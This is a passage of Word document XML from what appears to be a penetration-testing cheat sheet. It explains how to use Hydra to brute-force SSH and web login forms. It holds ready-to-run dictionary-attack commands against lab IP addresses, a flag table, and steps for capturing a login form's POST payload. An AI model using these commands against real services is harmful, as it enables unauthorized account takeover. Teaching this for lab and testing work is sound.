              <w:right w:val="single" w:sz="12" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="C5E0B3" w:themeFill="accent6" w:themeFillTint="66"/>
          </w:tcPr>
          <w:p w14:paraId="683EE746" w14:textId="59C14C41" w:rsidR="001D1C35" w:rsidRDefault="00E0706A" w:rsidP="00854B38">
            <w:r>
              <w:t>5</w:t>
            </w:r>
            <w:r w:rsidR="003C01E2">
              <w:t>8</w:t>
            </w:r>
            <w:r w:rsidR="001D1C35">
              <w:t>.a</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2393" w:type="dxa"/>
            <w:vMerge w:val="restart"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="24" w:space="0" w:color="auto"/>
              <w:left w:val="single" w:sz="12" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="12" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="E2EFD9" w:themeFill="accent6" w:themeFillTint="33"/>
          </w:tcPr>
          <w:p w14:paraId="0E0AEFFD" w14:textId="390B36BB" w:rsidR="001D1C35" w:rsidRPr="007D2453" w:rsidRDefault="001D1C35" w:rsidP="00854B38">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:i/>
                <w:iCs/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:t>Hydra</w:t>
            </w:r>
            <w:r>
              <w:br/>
            </w:r>
            <w:r w:rsidRPr="002024A0">
              <w:rPr>
                <w:i/>
                <w:iCs/>
              </w:rPr>
              <w:t>(</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:i/>
                <w:iCs/>
              </w:rPr>
              <w:t>Hydra</w:t>
            </w:r>
            <w:r w:rsidRPr="002024A0">
              <w:rPr>
                <w:i/>
                <w:iCs/>
              </w:rPr>
              <w:t xml:space="preserve"> is already installed on Kali Linux</w:t>
            </w:r>
            <w:r w:rsidR="00DC2A77">
              <w:rPr>
                <w:i/>
                <w:iCs/>
              </w:rPr>
              <w:t xml:space="preserve"> by default</w:t>
            </w:r>
            <w:r w:rsidRPr="002024A0">
              <w:rPr>
                <w:i/>
                <w:iCs/>
              </w:rPr>
              <w:t>)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="8023" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="24" w:space="0" w:color="auto"/>
              <w:left w:val="single" w:sz="12" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="24" w:space="0" w:color="auto"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="54A58032" w14:textId="3BC6A3E7" w:rsidR="001D1C35" w:rsidRPr="00D5731C" w:rsidRDefault="001D1C35" w:rsidP="00854B38">
            <w:pPr>
              <w:rPr>
                <w:color w:val="7030A0"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00D5731C">
              <w:rPr>
                <w:color w:val="7030A0"/>
              </w:rPr>
              <w:t xml:space="preserve">IF </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="7030A0"/>
              </w:rPr>
              <w:t>THERE IS A NETWORK LOGIN CONNECTION WITH USERNAMES AND PASSWORDS, THAT CAN BE BRUTE-FORCED, TRY HYDRA, OTHERWISE SKIP.</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="39C5406C" w14:textId="6AED02EC" w:rsidR="001D1C35" w:rsidRDefault="001D1C35" w:rsidP="00854B38">
            <w:r w:rsidRPr="001D1C35">
              <w:t>When you need brute force cracking remote authentication, Hydra Tool is a service often a tool of choice. It can cause fast dictionary attacks against over 50 protocols, including Telnet, ftp, http, https, smp, many databases, and much more.</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="062B279D" w14:textId="18D2A20E" w:rsidR="00FB4F4D" w:rsidRDefault="00FB4F4D" w:rsidP="00854B38">
            <w:pPr>
              <w:rPr>
                <w:color w:val="00B050"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">To use </w:t>
            </w:r>
            <w:r w:rsidRPr="00FB4F4D">
              <w:rPr>
                <w:color w:val="FF0000"/>
              </w:rPr>
              <w:t>hydra</w:t>
            </w:r>
            <w:r>
              <w:t>, the format will be something like:</w:t>
            </w:r>
            <w:r>
              <w:br/>
            </w:r>
            <w:r>
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="00FB4F4D">
              <w:rPr>
                <w:color w:val="FF0000"/>
              </w:rPr>
              <w:t>hydra</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidRPr="00FB4F4D">
              <w:rPr>
                <w:color w:val="00B0F0"/>
              </w:rPr>
              <w:t>-l</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidR="005F419D">
              <w:rPr>
                <w:color w:val="00B050"/>
              </w:rPr>
              <w:t>jan</w:t>
            </w:r>
            <w:r w:rsidRPr="00FB4F4D">
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidRPr="00FB4F4D">
              <w:rPr>
                <w:color w:val="00B0F0"/>
              </w:rPr>
              <w:t>-p</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidR="005F419D">
              <w:rPr>
                <w:color w:val="00B050"/>
              </w:rPr>
              <w:t>~/Documents/rockyou.txt</w:t>
            </w:r>
            <w:r w:rsidRPr="00FB4F4D">
              <w:rPr>
                <w:color w:val="00B050"/>
              </w:rPr>
              <w:t xml:space="preserve"> ssh</w:t>
            </w:r>
            <w:r w:rsidRPr="005F419D">
              <w:rPr>
                <w:color w:val="FF0000"/>
              </w:rPr>
              <w:t>://</w:t>
            </w:r>
            <w:r w:rsidR="005F419D">
              <w:rPr>
                <w:color w:val="00B050"/>
              </w:rPr>
              <w:t>10.10.30.5</w:t>
            </w:r>
            <w:r w:rsidR="005F419D">
              <w:rPr>
                <w:color w:val="00B050"/>
              </w:rPr>
              <w:br/>
            </w:r>
          </w:p>
          <w:p w14:paraId="1C992889" w14:textId="6B1505F7" w:rsidR="00FB4F4D" w:rsidRDefault="00FB4F4D" w:rsidP="00854B38">
            <w:r>
              <w:t xml:space="preserve">Notice  that the </w:t>
            </w:r>
            <w:r w:rsidRPr="003C01E2">
              <w:rPr>
                <w:color w:val="00B0F0"/>
              </w:rPr>
              <w:t xml:space="preserve">-l </w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve">and </w:t>
            </w:r>
            <w:r w:rsidRPr="003C01E2">
              <w:rPr>
                <w:color w:val="00B0F0"/>
              </w:rPr>
              <w:t xml:space="preserve">-p </w:t>
            </w:r>
            <w:r>
              <w:t>flags can be set to one string or set to try multiple strings saved into a text file, in the above example</w:t>
            </w:r>
            <w:r w:rsidR="005F419D">
              <w:t xml:space="preserve"> ‘</w:t>
            </w:r>
            <w:r w:rsidR="005F419D" w:rsidRPr="005F419D">
              <w:rPr>
                <w:color w:val="00B050"/>
              </w:rPr>
              <w:t>jan</w:t>
            </w:r>
            <w:r w:rsidR="005F419D">
              <w:t xml:space="preserve">’ is the username and the password is being brute forced from words within the </w:t>
            </w:r>
            <w:r w:rsidR="005F419D" w:rsidRPr="005F419D">
              <w:rPr>
                <w:color w:val="00B050"/>
              </w:rPr>
              <w:t xml:space="preserve">rockyou.txt </w:t>
            </w:r>
            <w:r w:rsidR="005F419D">
              <w:t xml:space="preserve">file. The </w:t>
            </w:r>
            <w:r w:rsidR="005F419D" w:rsidRPr="00D0630B">
              <w:rPr>
                <w:color w:val="00B050"/>
              </w:rPr>
              <w:t xml:space="preserve">service </w:t>
            </w:r>
            <w:r w:rsidR="005F419D">
              <w:t xml:space="preserve">being attacked comes last, followed by a </w:t>
            </w:r>
            <w:r w:rsidR="005F419D" w:rsidRPr="005F419D">
              <w:rPr>
                <w:color w:val="FF0000"/>
              </w:rPr>
              <w:t>://</w:t>
            </w:r>
            <w:r w:rsidR="005F419D">
              <w:t xml:space="preserve"> and the </w:t>
            </w:r>
            <w:r w:rsidR="005F419D" w:rsidRPr="005F419D">
              <w:rPr>
                <w:color w:val="00B050"/>
              </w:rPr>
              <w:t>target ip address</w:t>
            </w:r>
            <w:r w:rsidR="005F419D">
              <w:t>.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="001D1C35" w14:paraId="439C794D" w14:textId="77777777" w:rsidTr="001D1C35">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="611" w:type="dxa"/>
            <w:tcBorders>
              <w:left w:val="single" w:sz="24" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="12" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="C5E0B3" w:themeFill="accent6" w:themeFillTint="66"/>
          </w:tcPr>
          <w:p w14:paraId="480E6761" w14:textId="304727AC" w:rsidR="001D1C35" w:rsidRDefault="00E0706A" w:rsidP="00854B38">
            <w:r>
              <w:t>5</w:t>
            </w:r>
            <w:r w:rsidR="003C01E2">
              <w:t>8</w:t>
            </w:r>
            <w:r w:rsidR="001D1C35">
              <w:t>.b</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2393" w:type="dxa"/>
            <w:vMerge/>
            <w:tcBorders>
              <w:left w:val="single" w:sz="12" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="12" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="E2EFD9" w:themeFill="accent6" w:themeFillTint="33"/>
          </w:tcPr>
          <w:p w14:paraId="6BA0D9EA" w14:textId="77777777" w:rsidR="001D1C35" w:rsidRDefault="001D1C35" w:rsidP="00854B38">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="8023" w:type="dxa"/>
            <w:tcBorders>
              <w:left w:val="single" w:sz="12" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="24" w:space="0" w:color="auto"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="18C6480C" w14:textId="77777777" w:rsidR="00FB4F4D" w:rsidRDefault="00FB4F4D" w:rsidP="00FB4F4D">
            <w:r>
              <w:t xml:space="preserve">The command is </w:t>
            </w:r>
            <w:r w:rsidRPr="001D1C35">
              <w:rPr>
                <w:color w:val="FF0000"/>
              </w:rPr>
              <w:t>hydra</w:t>
            </w:r>
            <w:r>
              <w:t>, here are some useful flags:</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="14D4D282" w14:textId="2594F749" w:rsidR="001D1C35" w:rsidRPr="00EC64F5" w:rsidRDefault="00FB4F4D" w:rsidP="00FB4F4D">
            <w:r>
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="004A0670">
              <w:rPr>
                <w:color w:val="00B0F0"/>
              </w:rPr>
              <w:t>-R</w:t>
            </w:r>
            <w:r>
              <w:tab/>
              <w:t>Restore a previous session</w:t>
            </w:r>
            <w:r>
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="004A0670">
              <w:rPr>
                <w:color w:val="00B0F0"/>
              </w:rPr>
              <w:t>-S</w:t>
            </w:r>
            <w:r>
              <w:tab/>
              <w:t>Connect via SSL</w:t>
            </w:r>
            <w:r>
              <w:br/>
            </w:r>
            <w:r>
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="004A0670">
              <w:rPr>
                <w:color w:val="00B0F0"/>
              </w:rPr>
              <w:t>-s</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidRPr="004A0670">
              <w:rPr>
                <w:color w:val="00B050"/>
              </w:rPr>
              <w:t>#</w:t>
            </w:r>
            <w:r>
              <w:tab/>
              <w:t>Port number</w:t>
            </w:r>
            <w:r>
              <w:tab/>
            </w:r>
            <w:r>
              <w:tab/>
            </w:r>
            <w:r>
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="004A0670">
              <w:rPr>
                <w:color w:val="00B0F0"/>
              </w:rPr>
              <w:t>-O</w:t>
            </w:r>
            <w:r>
              <w:tab/>
              <w:t>Use old SSL v2 and v3</w:t>
            </w:r>
            <w:r>
              <w:br/>
            </w:r>
            <w:r>
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="004A0670">
              <w:rPr>
                <w:color w:val="00B0F0"/>
              </w:rPr>
              <w:t>-l</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidR="00626972" w:rsidRPr="00626972">
              <w:rPr>
                <w:color w:val="00B050"/>
              </w:rPr>
              <w:t>NAME</w:t>
            </w:r>
            <w:r>
              <w:tab/>
              <w:t xml:space="preserve">Login with </w:t>
            </w:r>
            <w:r w:rsidR="005F419D">
              <w:t xml:space="preserve">a specified </w:t>
            </w:r>
            <w:r>
              <w:t>nam</w:t>
            </w:r>
            <w:r w:rsidR="005F419D">
              <w:t>e</w:t>
            </w:r>
            <w:r w:rsidR="005F419D">
              <w:br/>
            </w:r>
            <w:r w:rsidR="005F419D">
              <w:tab/>
            </w:r>
            <w:r w:rsidR="005F419D" w:rsidRPr="00626972">
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="00B0F0"/>
              </w:rPr>
              <w:t>-L</w:t>
            </w:r>
            <w:r w:rsidR="005F419D" w:rsidRPr="00626972">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidR="00626972" w:rsidRPr="00626972">
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="00B050"/>
              </w:rPr>
              <w:t>FILE.txt</w:t>
            </w:r>
            <w:r w:rsidR="005F419D" w:rsidRPr="00626972">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:tab/>
              <w:t>Brute force the username using a word list file</w:t>
            </w:r>
            <w:r w:rsidR="005F419D">
              <w:tab/>
            </w:r>
            <w:r w:rsidR="00626972">
              <w:br/>
            </w:r>
            <w:r w:rsidR="00626972">
              <w:tab/>
            </w:r>
            <w:r w:rsidR="00626972" w:rsidRPr="00626972">
              <w:rPr>
                <w:color w:val="00B0F0"/>
              </w:rPr>
              <w:t xml:space="preserve">-p </w:t>
            </w:r>
            <w:r w:rsidR="00626972" w:rsidRPr="00626972">
              <w:rPr>
                <w:color w:val="00B050"/>
              </w:rPr>
              <w:t>NAME</w:t>
            </w:r>
            <w:r w:rsidR="00626972">
              <w:tab/>
              <w:t>Login with a specified password</w:t>
            </w:r>
            <w:r w:rsidR="005F419D">
              <w:br/>
            </w:r>
            <w:r w:rsidR="005F419D">
              <w:rPr>
                <w:color w:val="00B0F0"/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="00626972">
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="00B0F0"/>
              </w:rPr>
              <w:t>-</w:t>
            </w:r>
            <w:r w:rsidR="005F419D" w:rsidRPr="00626972">
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="00B0F0"/>
              </w:rPr>
              <w:t>P</w:t>
            </w:r>
            <w:r w:rsidRPr="00626972">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidRPr="00626972">
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="00B050"/>
              </w:rPr>
              <w:t>FILE</w:t>
            </w:r>
            <w:r w:rsidR="00626972" w:rsidRPr="00626972">
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="00B050"/>
              </w:rPr>
              <w:t>.txt</w:t>
            </w:r>
            <w:r w:rsidRPr="00626972">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="005F419D" w:rsidRPr="00626972">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t xml:space="preserve">Brute force </w:t>
            </w:r>
            <w:r w:rsidR="00626972" w:rsidRPr="00626972">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>the password using a word list</w:t>
            </w:r>
            <w:r w:rsidRPr="00626972">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t xml:space="preserve"> file</w:t>
            </w:r>
            <w:r>
              <w:br/>
            </w:r>
            <w:r>
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="004A0670">
              <w:rPr>
                <w:color w:val="00B0F0"/>
              </w:rPr>
              <w:t>-e</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidRPr="004A0670">
              <w:rPr>
                <w:color w:val="00B0F0"/>
              </w:rPr>
              <w:t>nsr</w:t>
            </w:r>
            <w:r>
              <w:tab/>
              <w:t>Additional checks, ‘</w:t>
            </w:r>
            <w:r w:rsidRPr="00D0630B">
              <w:rPr>
                <w:color w:val="00B0F0"/>
              </w:rPr>
              <w:t>n</w:t>
            </w:r>
            <w:r>
              <w:t>’ for null password, ‘</w:t>
            </w:r>
            <w:r w:rsidRPr="00D0630B">
              <w:rPr>
                <w:color w:val="00B0F0"/>
              </w:rPr>
              <w:t>s</w:t>
            </w:r>
            <w:r>
              <w:t>’ for try login as pass</w:t>
            </w:r>
            <w:r>
              <w:br/>
            </w:r>
            <w:r>
              <w:tab/>
            </w:r>
            <w:r>
              <w:tab/>
              <w:t>and ‘</w:t>
            </w:r>
            <w:r w:rsidRPr="00D0630B">
              <w:rPr>
                <w:color w:val="00B0F0"/>
              </w:rPr>
              <w:t>r</w:t>
            </w:r>
            <w:r>
              <w:t>’ for try the reverse login as pass too</w:t>
            </w:r>
            <w:r>
              <w:br/>
            </w:r>
            <w:r>
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="001B20B1">
              <w:rPr>
                <w:color w:val="00B0F0"/>
              </w:rPr>
              <w:t>-u</w:t>
            </w:r>
            <w:r>
              <w:tab/>
              <w:t xml:space="preserve">Instead of picking one user to test all passwords, this picks one </w:t>
            </w:r>
            <w:r>
              <w:tab/>
            </w:r>
            <w:r>
              <w:tab/>
            </w:r>
            <w:r>
              <w:tab/>
              <w:t>password to test all logins (the opposite of the default behaviour)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="008359ED" w14:paraId="108F4D24" w14:textId="77777777" w:rsidTr="001D1C35">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="611" w:type="dxa"/>
            <w:tcBorders>
              <w:left w:val="single" w:sz="24" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="12" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="C5E0B3" w:themeFill="accent6" w:themeFillTint="66"/>
          </w:tcPr>
          <w:p w14:paraId="1A3644CD" w14:textId="39C72306" w:rsidR="008359ED" w:rsidRDefault="008359ED" w:rsidP="00854B38">
            <w:r>
              <w:t>58.c</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2393" w:type="dxa"/>
            <w:tcBorders>
              <w:left w:val="single" w:sz="12" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="12" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="E2EFD9" w:themeFill="accent6" w:themeFillTint="33"/>
          </w:tcPr>
          <w:p w14:paraId="41B4666A" w14:textId="77777777" w:rsidR="008359ED" w:rsidRDefault="008359ED" w:rsidP="00854B38">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:t>Hydra</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="2EFA25CB" w14:textId="484F1532" w:rsidR="008359ED" w:rsidRPr="008359ED" w:rsidRDefault="008359ED" w:rsidP="00854B38">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:i/>
                <w:iCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="008359ED">
              <w:rPr>
                <w:i/>
                <w:iCs/>
              </w:rPr>
              <w:t>(Using Hydra to brute force a web page login)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="8023" w:type="dxa"/>
            <w:tcBorders>
              <w:left w:val="single" w:sz="12" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="24" w:space="0" w:color="auto"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="0218F3C1" w14:textId="77777777" w:rsidR="008359ED" w:rsidRPr="00D0630B" w:rsidRDefault="008359ED" w:rsidP="00FB4F4D">
            <w:pPr>
              <w:rPr>
                <w:color w:val="7030A0"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00D0630B">
              <w:rPr>
                <w:color w:val="7030A0"/>
              </w:rPr>
              <w:t>IF YOU HAVE A WEB PAGE WITH A LOGIN PAGE, HYDRA CAN BE USED ALSO.</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="14E20537" w14:textId="77777777" w:rsidR="008359ED" w:rsidRDefault="008359ED" w:rsidP="00FB4F4D">
            <w:r>
              <w:t>But… it’s not as simple as attacking ssh. First, ensure you know the saved location of your wordlist files that you will use to dictionary attack with.</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="31BAEDB2" w14:textId="387498B2" w:rsidR="008359ED" w:rsidRDefault="008359ED" w:rsidP="00FB4F4D">
            <w:r>
              <w:t>The command will look something like this:</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="421D19FE" w14:textId="77777777" w:rsidR="004D1DE9" w:rsidRDefault="008359ED" w:rsidP="00FB4F4D">
            <w:r>
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="008359ED">
              <w:rPr>
                <w:color w:val="FF0000"/>
                <w:u w:val="single"/>
              </w:rPr>
              <w:t>sudo</w:t>
            </w:r>
            <w:r w:rsidRPr="008359ED">
              <w:rPr>
                <w:color w:val="FF0000"/>
              </w:rPr>
              <w:t xml:space="preserve"> hydra </w:t>
            </w:r>
            <w:r w:rsidRPr="008359ED">
              <w:rPr>
                <w:color w:val="00B0F0"/>
              </w:rPr>
              <w:t>-L</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="00B0F0"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidRPr="008359ED">
              <w:rPr>
                <w:color w:val="00B050"/>
              </w:rPr>
              <w:t>rockyou.txt</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="00B050"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidRPr="008359ED">
              <w:rPr>
                <w:color w:val="00B0F0"/>
              </w:rPr>
              <w:t xml:space="preserve">-P </w:t>
            </w:r>
            <w:r w:rsidRPr="008359ED">
              <w:rPr>
                <w:color w:val="00B050"/>
              </w:rPr>
              <w:t xml:space="preserve">rockyou.txt </w:t>
            </w:r>
            <w:r w:rsidR="00B815BD" w:rsidRPr="00B815BD">
              <w:rPr>
                <w:color w:val="92D050"/>
              </w:rPr>
              <w:t xml:space="preserve">10.10.10.85 </w:t>
            </w:r>
            <w:r w:rsidR="00B815BD" w:rsidRPr="00B815BD">
              <w:rPr>
                <w:color w:val="00B0F0"/>
              </w:rPr>
              <w:t>http-post-form</w:t>
            </w:r>
            <w:r w:rsidRPr="00B815BD">
              <w:rPr>
                <w:color w:val="00B0F0"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="00B815BD">
              <w:rPr>
                <w:color w:val="FF0000"/>
              </w:rPr>
              <w:t>"</w:t>
            </w:r>
            <w:r w:rsidR="00B815BD" w:rsidRPr="00B815BD">
              <w:rPr>
                <w:color w:val="00B050"/>
              </w:rPr>
              <w:t>/home/login.php</w:t>
            </w:r>
            <w:r w:rsidRPr="00B815BD">
              <w:rPr>
                <w:color w:val="FF0000"/>
              </w:rPr>
              <w:t>:</w:t>
            </w:r>
            <w:r w:rsidR="00B815BD" w:rsidRPr="00B815BD">
              <w:rPr>
                <w:color w:val="00B050"/>
              </w:rPr>
              <w:t>username=</w:t>
            </w:r>
            <w:r w:rsidR="00B815BD" w:rsidRPr="00B815BD">
              <w:rPr>
                <w:color w:val="00B0F0"/>
              </w:rPr>
              <w:t>^USER^</w:t>
            </w:r>
            <w:r w:rsidR="00B815BD" w:rsidRPr="00B815BD">
              <w:rPr>
                <w:color w:val="00B050"/>
              </w:rPr>
              <w:t>&amp;password=</w:t>
            </w:r>
            <w:r w:rsidR="00B815BD" w:rsidRPr="00B815BD">
              <w:rPr>
                <w:color w:val="00B0F0"/>
              </w:rPr>
              <w:t>^PASS^</w:t>
            </w:r>
            <w:r w:rsidRPr="00B815BD">
              <w:rPr>
                <w:color w:val="FF0000"/>
              </w:rPr>
              <w:t>:</w:t>
            </w:r>
            <w:r w:rsidR="00B815BD" w:rsidRPr="00B815BD">
              <w:rPr>
                <w:color w:val="00B050"/>
              </w:rPr>
              <w:t xml:space="preserve">Invalid Username </w:t>
            </w:r>
            <w:r w:rsidR="00B815BD">
              <w:rPr>
                <w:color w:val="00B050"/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="00B815BD" w:rsidRPr="00B815BD">
              <w:rPr>
                <w:color w:val="00B050"/>
              </w:rPr>
              <w:t>and Password!</w:t>
            </w:r>
            <w:r w:rsidR="00B815BD">
              <w:rPr>
                <w:color w:val="FF0000"/>
              </w:rPr>
              <w:t>”</w:t>
            </w:r>
            <w:r>
              <w:tab/>
            </w:r>
            <w:r>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="00B815BD">
              <w:tab/>
            </w:r>
            <w:r w:rsidR="00B815BD">
              <w:tab/>
            </w:r>
            <w:r w:rsidR="00B815BD">
              <w:tab/>
            </w:r>
            <w:r w:rsidR="00B815BD">
              <w:tab/>
            </w:r>
            <w:r w:rsidR="00B815BD">
              <w:tab/>
            </w:r>
            <w:r>
              <w:t>(All one line)</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="796DD7BC" w14:textId="6F63D367" w:rsidR="004D1DE9" w:rsidRDefault="004D1DE9" w:rsidP="00FB4F4D">
            <w:r>
              <w:t xml:space="preserve">You will more often than not be using the </w:t>
            </w:r>
            <w:r w:rsidRPr="004D1DE9">
              <w:rPr>
                <w:color w:val="00B0F0"/>
              </w:rPr>
              <w:t xml:space="preserve">http-post-form </w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve">flag, but use your web browser, developer tools (usually you can press f12) and check under the ‘network’ tab; when you enter/send a login request, you should see a new entry in the network tab with POST as the method (Hydra understands POST as </w:t>
            </w:r>
            <w:r w:rsidRPr="009105AD">
              <w:rPr>
                <w:color w:val="00B0F0"/>
              </w:rPr>
              <w:t>http-post-form</w:t>
            </w:r>
            <w:r>
              <w:t>).</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="74240667" w14:textId="77777777" w:rsidR="009105AD" w:rsidRDefault="009105AD" w:rsidP="00FB4F4D"/>
          <w:p w14:paraId="6FCC2CF4" w14:textId="219606C8" w:rsidR="009105AD" w:rsidRDefault="009105AD" w:rsidP="00FB4F4D">
            <w:r>
              <w:t xml:space="preserve">Don’t forget the double quotation marks to open and close the rest of the argument </w:t>
            </w:r>
            <w:r w:rsidRPr="009105AD">
              <w:rPr>
                <w:color w:val="FF0000"/>
              </w:rPr>
              <w:t>“</w:t>
            </w:r>
            <w:r>
              <w:t>.</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="31C39F0D" w14:textId="3109FC75" w:rsidR="009105AD" w:rsidRDefault="009105AD" w:rsidP="00FB4F4D">
            <w:r>
              <w:t xml:space="preserve">Now, you need to specifiy the page we are attacking, in this example its… </w:t>
            </w:r>
            <w:r w:rsidRPr="009105AD">
              <w:rPr>
                <w:color w:val="00B050"/>
              </w:rPr>
              <w:t>/home/login.php</w:t>
            </w:r>
            <w:r>
              <w:t>. This can be found in the URL bar of the browser.</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="3D44ACD8" w14:textId="1D49CD44" w:rsidR="009105AD" w:rsidRDefault="009105AD" w:rsidP="00FB4F4D"/>
          <w:p w14:paraId="1271902D" w14:textId="30633996" w:rsidR="00D2620F" w:rsidRDefault="009105AD" w:rsidP="00FB4F4D">
            <w:r>
              <w:t xml:space="preserve">Next, don’t forget a colon </w:t>
            </w:r>
            <w:r w:rsidRPr="009105AD">
              <w:rPr>
                <w:color w:val="FF0000"/>
              </w:rPr>
              <w:t>:</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> to separate this from the ‘Request payload’ which is the information we send along in the body of</w:t>
            </w:r>
            <w:r w:rsidR="00D2620F">
              <w:t xml:space="preserve"> the POST request. This needs to be copied and pasted; it will look something like below… use all of this, including the </w:t>
            </w:r>
            <w:r w:rsidR="00D2620F" w:rsidRPr="00D2620F">
              <w:rPr>
                <w:color w:val="FF0000"/>
              </w:rPr>
              <w:t>&amp;</w:t>
            </w:r>
            <w:r w:rsidR="00D2620F">
              <w:rPr>
                <w:color w:val="FF0000"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
